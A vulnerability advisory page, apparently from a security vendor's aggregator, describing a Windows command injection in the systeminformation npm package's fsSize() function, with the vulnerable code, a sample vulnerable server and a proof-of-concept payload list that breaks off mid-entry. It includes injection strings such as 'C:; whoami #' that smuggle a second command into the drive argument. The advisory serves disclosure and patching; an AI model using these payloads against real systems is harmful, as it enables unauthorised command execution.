🛡️ CVE-2025-68154 — systeminformation

🟠 CVSS 8.0 — High ⚠️ Exploit Public CWE-78 OSV
8.0
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

systeminformation has a Command Injection vulnerability in fsSize() function on Windows

Summary

The fsSize() function in systeminformation is vulnerable to OS Command Injection (CWE-78) on Windows systems. The optional drive parameter is directly concatenated into a PowerShell command without sanitization, allowing arbitrary command execution when user-controlled input reaches this function.

Affected Platforms: Windows only

CVSS Breakdown:

  • Attack Vector (AV:N): Network - if used in a web application/API
  • Attack Complexity (AC:H): High - requires application to pass user input to fsSize()
  • Privileges Required (PR:N): None - no authentication required at library level
  • User Interaction (UI:N): None
  • Scope (S:U): Unchanged - executes within Node.js process context
  • Confidentiality/Integrity/Availability (C:H/I:H/A:H): High impact if exploited

> Note: The actual exploitability depends on how applications use this function. If an application does not pass user-controlled input to fsSize(), it is not vulnerable.

Details

Vulnerable Code Location

File: lib/filesystem.js, Line 197

```javascript

if (_windows) {

try {

const cmd = Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? '| where -property Caption -eq ' + drive : ''} | fl;

util.powerShell(cmd).then((stdout, error) => {

```

The drive parameter is concatenated directly into the PowerShell command string without any sanitization.

Why This Is a Vulnerability

This is inconsistent with the security pattern used elsewhere in the codebase. Other functions properly sanitize user input using util.sanitizeShellString():

| File | Line | Function | Sanitization |

|------|------|----------|--------------|

| lib/processes.js | 141 | services() | ✅ util.sanitizeShellString(srv) |

| lib/processes.js | 1006 | processLoad() | ✅ util.sanitizeShellString(proc) |

| lib/network.js | 1253 | networkStats() | ✅ util.sanitizeShellString(iface) |

| lib/docker.js | 472 | dockerContainerStats() | ✅ util.sanitizeShellString(containerIDs, true) |

| lib/filesystem.js | 197 | fsSize() | ❌ No sanitization |

The sanitizeShellString() function (defined at lib/util.js:731) removes dangerous characters like ;, &, |, $, ` `, #`, etc., which would prevent command injection.

PoC

Attack Scenario

An application exposes disk information via an API and passes user input to si.fsSize():

```javascript

// Vulnerable application example

const si = require('systeminformation');

const http = require('http');

const url = require('url');

http.createServer(async (req, res) => {

const parsedUrl = url.parse(req.url, true);

const drive = parsedUrl.query.drive; // User-controlled input

// VULNERABLE: User input passed directly to fsSize()

const diskInfo = await si.fsSize(drive);

res.end(JSON.stringify(diskInfo));

}).listen(3000);

```

Exploitation

Normal Request:

```

GET /api/disk?drive=C:

```

Malicious Request (Command Injection):

```

GET /api/disk?drive=C:;%20whoami%20%23

```

Command Construction Demonstration

The following demonstrates how commands are constructed with malicious input:

Normal usage:

```

Input: "C:"

Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C: | fl

```

With injection payload C:; whoami #:

```

Input: "C:; whoami #"

Command: Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size | where -property Caption -eq C:; whoami # | fl

↑ ↑

semicolon terminates # comments out rest

first command

```

PowerShell will execute:

1. Get-WmiObject Win32_logicaldisk | ... | where -property Caption -eq C: (original command)

2. whoami (injected command)

3. Everything after # is commented out

PoC Script

```javascript

/**

  • Command Injection PoC - systeminformation fsSize()

*

  • Run with: node poc.js
  • Requires: npm install systeminformation

*/

const os = require('os');

// Simulates the vulnerable command construction from filesystem.js:197

function simulateVulnerableCommand(drive) {

const cmd = Get-WmiObject Win32_logicaldisk | select Access,Caption,FileSystem,FreeSpace,Size ${drive ? '| where -property Caption -eq ' + drive : ''} | fl;

return cmd;

}

// Test payloads

const payloads = [

{ name: 'Normal', input: 'C:' },

{ name: 'Command Execution', input: 'C:; whoami #' },

{ name: 'Data Exfiltration', input: 'C:; Get-Process | Out-File C:\\temp\\procs.txt #' },

{ name: 'Remote Paylo

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is high, an attacker needs no privileges on the target. No user interaction is required. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality high, integrity high, availability high.

Weakness class

CVE-2025-68154 is classified as CWE-78: OS Command Injection. Untrusted input reaches a shell command without neutralisation, so an attacker can run arbitrary operating system commands.

Affected software

CVE-2025-68154 is recorded against 1 package.

  • systeminformation

Timeline and source

Published on 16 December 2025 and last revised on 17 June 2026. A public exploit is known to exist, which raises the urgency of patching considerably. A vendor advisory or fix has been published. Record sourced from OSV.

References

github.com (Web)
nvd.nist.gov (Advisory)
github.com (Web)
github.com (Package)

CVE-2025-68154 on other distributions

Each distribution ships its own build and its own fixed version. Pick the one you run:

Details

Severity HIGH
CVSS Score 8.0
CVSS Vector CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE CWE-78
Public Exploit ⚠️ Yes
Source OSV
Published 2025-12-16
Updated 2026-08-12
Modified 2026-06-17

Affected Packages

Software From version Fixed in
systeminformation

Exploit Protection

Are you running systeminformation?

CVE-2025-68154 carries CVSS 8.0 High rating and a public exploit already exists. BotEraser checks your installation against this and other known CVE records, and blocks IPs associated with exploit activity.

Check My Site For CVE-2025-68154 →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.

Browse related advisories

All advisoriesCVECVE 2025